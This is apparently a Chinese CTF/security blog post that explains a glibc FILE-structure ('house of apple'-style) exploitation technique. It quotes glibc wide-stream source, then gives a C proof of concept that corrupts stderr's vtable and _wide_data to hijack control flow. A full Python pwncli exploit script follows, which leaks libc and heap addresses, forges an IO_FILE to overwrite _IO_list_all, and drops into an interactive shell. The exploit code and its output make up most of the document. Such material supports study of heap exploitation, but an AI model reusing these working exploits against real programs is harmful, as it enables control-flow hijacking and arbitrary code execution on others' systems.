#define _IO_OVERFLOW(FP, CH) JUMP1 (__overflow, FP, CH) #define JUMP1(FUNC, THIS, X1) (_IO_JUMPS_FUNC(THIS)->FUNC) (THIS, X1) # define _IO_JUMPS_FUNC(THIS) (IO_validate_vtable (_IO_JUMPS_FILE_plus (THIS)))

struct _IO_wide_data{  wchar_t *_IO_read_ptr;    /* Current read pointer */  wchar_t *_IO_read_end;    /* End of get area. */  wchar_t *_IO_read_base;    /* Start of putback+get area. */  wchar_t *_IO_write_base;    /* Start of put area. */  wchar_t *_IO_write_ptr;    /* Current put pointer. */  wchar_t *_IO_write_end;    /* End of put area. */  wchar_t *_IO_buf_base;    /* Start of reserve area. */  wchar_t *_IO_buf_end;        /* End of reserve area. */  /* The following fields are used to support backing up and undo. */  wchar_t *_IO_save_base;    /* Pointer to start of non-current get area. */  wchar_t *_IO_backup_base;    /* Pointer to first valid character of                   backup area */  wchar_t *_IO_save_end;    /* Pointer to end of non-current get area. */   __mbstate_t _IO_state;  __mbstate_t _IO_last_state;  struct _IO_codecvt _codecvt;  wchar_t _shortbuf[1];  const struct _IO_jump_t *_wide_vtable;};

#define _IO_WOVERFLOW(FP, CH) WJUMP1 (__overflow, FP, CH) #define WJUMP1(FUNC, THIS, X1) (_IO_WIDE_JUMPS_FUNC(THIS)->FUNC) (THIS, X1) #define _IO_WIDE_JUMPS_FUNC(THIS) _IO_WIDE_JUMPS(THIS) #define _IO_WIDE_JUMPS(THIS) \  _IO_CAST_FIELD_ACCESS ((THIS), struct _IO_FILE, _wide_data)->_wide_vtable

#include<stdio.h>#include<stdlib.h>#include<stdint.h>#include<unistd.h>#include <string.h> void backdoor(){    printf("\033[31m[!] Backdoor is called!\n");    _exit(0);} void main(){    setbuf(stdout, 0);    setbuf(stdin, 0);    setbuf(stderr, 0);     char *p1 = calloc(0x200, 1);    char *p2 = calloc(0x200, 1);    puts("[*] allocate two 0x200 chunks");     size_t puts_addr = (size_t)&puts;    printf("[*] puts address: %p\n", (void *)puts_addr);    size_t libc_base_addr = puts_addr - 0x84420;    printf("[*] libc base address: %p\n", (void *)libc_base_addr);     size_t _IO_2_1_stderr_addr = libc_base_addr + 0x1ed5c0;    printf("[*] _IO_2_1_stderr_ address: %p\n", (void *)_IO_2_1_stderr_addr);     size_t _IO_wstrn_jumps_addr = libc_base_addr + 0x1e8c60;    printf("[*] _IO_wstrn_jumps address: %p\n", (void *)_IO_wstrn_jumps_addr);     char *stderr2 = (char *)_IO_2_1_stderr_addr;    puts("[+] step 1: change stderr->_flags to 0x800");    *(size_t *)stderr2 = 0x800;     puts("[+] step 2: change stderr->_mode to 1");    *(size_t *)(stderr2 + 0xc0) = 1;     puts("[+] step 3: change stderr->vtable to _IO_wstrn_jumps-0x20");    *(size_t *)(stderr2 + 0xd8) = _IO_wstrn_jumps_addr-0x20;     puts("[+] step 4: replace stderr->_wide_data with the allocated chunk p1");    *(size_t *)(stderr2 + 0xa0) = (size_t)p1;     puts("[+] step 5: set stderr->_wide_data->_wide_vtable with the allocated chunk p2");    *(size_t *)(p1 + 0xe0) = (size_t)p2;     puts("[+] step 6: set stderr->_wide_data->_wide_vtable->_IO_write_ptr >  stderr->_wide_data->_wide_vtable->_IO_write_base");    *(size_t *)(p1 + 0x20) = (size_t)1;     puts("[+] step 7: put backdoor at fake _wide_vtable->_overflow");    *(size_t *)(p2 + 0x18) = (size_t)(&backdoor);     puts("[+] step 8: call fflush(stderr) to trigger backdoor func");    fflush(stderr); }

[*] allocate two 0x200 chunks[*] puts address: 0x7f8f73d2e420[*] libc base address: 0x7f8f73caa000[*] _IO_2_1_stderr_ address: 0x7f8f73e975c0[*] _IO_wstrn_jumps address: 0x7f8f73e92c60[+] step 1: change stderr->_flags to 0x800[+] step 2: change stderr->_mode to 1[+] step 3: change stderr->vtable to _IO_wstrn_jumps-0x20[+] step 4: replace stderr->_wide_data with the allocated chunk p1[+] step 5: set stderr->_wide_data->_wide_vtable with the allocated chunk p2[+] step 6: set stderr->_wide_data->_wide_vtable->_IO_write_ptr >  stderr->_wide_data->_wide_vtable->_IO_write_base[+] step 7: put backdoor at fake _wide_vtable->_overflow[+] step 8: call fflush(stderr) to trigger backdoor func[!] Backdoor is called!

_IO_wfile_overflow    _IO_wdoallocbuf        _IO_WDOALLOCATE            *(fp->_wide_data->_wide_vtable + 0x68)(fp)

wint_t_IO_wfile_overflow (FILE *f, wint_t wch){  if (f->_flags & _IO_NO_WRITES) /* SET ERROR */    {      f->_flags |= _IO_ERR_SEEN;      __set_errno (EBADF);      return WEOF;    }  /* If currently reading or no buffer allocated. */  if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0)    {      /* Allocate a buffer if needed. */      if (f->_wide_data->_IO_write_base == 0)    {      _IO_wdoallocbuf (f);// 需要走到这里      // ......    }    }}

void_IO_wdoallocbuf (FILE *fp){  if (fp->_wide_data->_IO_buf_base)    return;  if (!(fp->_flags & _IO_UNBUFFERED))    if ((wint_t)_IO_WDOALLOCATE (fp) != WEOF)// _IO_WXXXX调用      return;  _IO_wsetb (fp, fp->_wide_data->_shortbuf,             fp->_wide_data->_shortbuf + 1, 0);}libc_hidden_def (_IO_wdoallocbuf)

_IO_wfile_underflow_mmap    _IO_wdoallocbuf        _IO_WDOALLOCATE            *(fp->_wide_data->_wide_vtable + 0x68)(fp)

static wint_t_IO_wfile_underflow_mmap (FILE *fp){  struct _IO_codecvt *cd;  const char *read_stop;   if (__glibc_unlikely (fp->_flags & _IO_NO_READS))    {      fp->_flags |= _IO_ERR_SEEN;      __set_errno (EBADF);      return WEOF;    }  if (fp->_wide_data->_IO_read_ptr < fp->_wide_data->_IO_read_end)    return *fp->_wide_data->_IO_read_ptr;   cd = fp->_codecvt;   /* Maybe there is something left in the external buffer.  */  if (fp->_IO_read_ptr >= fp->_IO_read_end      /* No.  But maybe the read buffer is not fully set up.  */      && _IO_file_underflow_mmap (fp) == EOF)    /* Nothing available.  _IO_file_underflow_mmap has set the EOF or error       flags as appropriate.  */    return WEOF;   /* There is more in the external.  Convert it.  */  read_stop = (const char *) fp->_IO_read_ptr;   if (fp->_wide_data->_IO_buf_base == NULL)    {      /* Maybe we already have a push back pointer.  */      if (fp->_wide_data->_IO_save_base != NULL)    {      free (fp->_wide_data->_IO_save_base);      fp->_flags &= ~_IO_IN_BACKUP;    }      _IO_wdoallocbuf (fp);// 需要走到这里    }    //......}

_IO_wdefault_xsgetn    __wunderflow        _IO_switch_to_wget_mode            _IO_WOVERFLOW                *(fp->_wide_data->_wide_vtable + 0x18)(fp)

size_t_IO_wdefault_xsgetn (FILE *fp, void *data, size_t n){  size_t more = n;  wchar_t *s = (wchar_t*) data;  for (;;)    {      /* Data available. */      ssize_t count = (fp->_wide_data->_IO_read_end                       - fp->_wide_data->_IO_read_ptr);      if (count > 0)    {      if ((size_t) count > more)        count = more;      if (count > 20)        {          s = __wmempcpy (s, fp->_wide_data->_IO_read_ptr, count);          fp->_wide_data->_IO_read_ptr += count;        }      else if (count <= 0)        count = 0;      else        {          wchar_t *p = fp->_wide_data->_IO_read_ptr;          int i = (int) count;          while (--i >= 0)        *s++ = *p++;          fp->_wide_data->_IO_read_ptr = p;            }            more -= count;        }      if (more == 0 || __wunderflow (fp) == WEOF)    break;    }  return n - more;}libc_hidden_def (_IO_wdefault_xsgetn)

wint_t__wunderflow (FILE *fp){  if (fp->_mode < 0 || (fp->_mode == 0 && _IO_fwide (fp, 1) != 1))    return WEOF;   if (fp->_mode == 0)    _IO_fwide (fp, 1);  if (_IO_in_put_mode (fp))    if (_IO_switch_to_wget_mode (fp) == EOF)      return WEOF;    // ......}

int_IO_switch_to_wget_mode (FILE *fp){  if (fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base)    if ((wint_t)_IO_WOVERFLOW (fp, WEOF) == WEOF) // 需要走到这里      return EOF;    // .....}

target_addr = libc.sym._IO_list_all_IO_wfile_jumps = libc.sym._IO_wfile_jumps _lock = libc_base + 0x1f5720fake_IO_FILE = heap_base + 0x1810 f1 = IO_FILE_plus_struct()f1.flags = u64_ex("  hack!")f1._IO_read_ptr = 0xa81f1._lock = _lockf1._wide_data = fake_IO_FILE + 0xe0f1.vtable = _IO_wfile_jumps

#!/usr/bin/python3# -*- encoding: utf-8 -*-# author: roderick from pwncli import * cli_script() io: tube = gift['io']elf: ELF = gift['elf']libc: ELF = gift['libc'] small = 1medium = 2large = 3key = 10 def add(c):    sla("enter your command: \n", "1")    sla("choise: ", str(c)) def dele(i):    sla("enter your command: \n", "2")    sla("Index: \n", str(i)) def read_once(i, data):    sla("enter your command: \n", "3")    sla("Index: ", str(i))    sa("Message: \n", flat(data, length=0x110 * key)) def write_once(i):    sla("enter your command: \n", "4")    sla("Index: ", str(i))    ru("Message: \n")    m = rn(0x10)    d1 = u64_ex(m[:8])    d2 = u64_ex(m[8:])    log_address_ex("d1")    log_address_ex("d2")    return d1, d2 def bye():    sla("enter your command: \n", "9")  sla("enter your key >>\n", str(key)) add(medium)add(medium)add(small) dele(2)dele(1)dele(0) add(small)add(small)add(small)add(small) dele(3)dele(5)m1, m2 = write_once(3)libc_base = set_current_libc_base_and_log(m1, 0x1f2cc0)heap_base = m2 - 0x17f0 dele(4)dele(6) add(large)add(small)add(small) dele(8)add(large) target_addr = libc.sym._IO_list_all_IO_wfile_jumps = libc.sym._IO_wfile_jumps _lock = libc_base + 0x1f5720fake_IO_FILE = heap_base + 0x1810 f1 = IO_FILE_plus_struct()f1.flags = u64_ex("  hack!")f1._IO_read_ptr = 0xa81f1._lock = _lockf1._wide_data = fake_IO_FILE + 0xe0f1.vtable = _IO_wfile_jumps data = flat({    0x8: target_addr - 0x20,    0x10: {        0: {            0: bytes(f1),            0xe0: {# _wide_data->_wide_vtable                0x18: 0, # f->_wide_data->_IO_write_base                0x30: 0, # f->_wide_data->_IO_buf_base                0xe0: fake_IO_FILE+0x200            },            0x200: {                0x68: libc.sym.puts            }        },        0xa80: [0, 0xab1]    }}) read_once(5, data) dele(2)add(large) bye() ia()

# 往期推荐

1.so文件分析的一些心得

2.bang加固简单分析

3.从PWN题NULL_FXCK中学到的glibc知识

4.指令级工具Dobby源码阅读

5.AFL速通——流程及afl-fuzz.c源码简析

6.sql注入学习笔记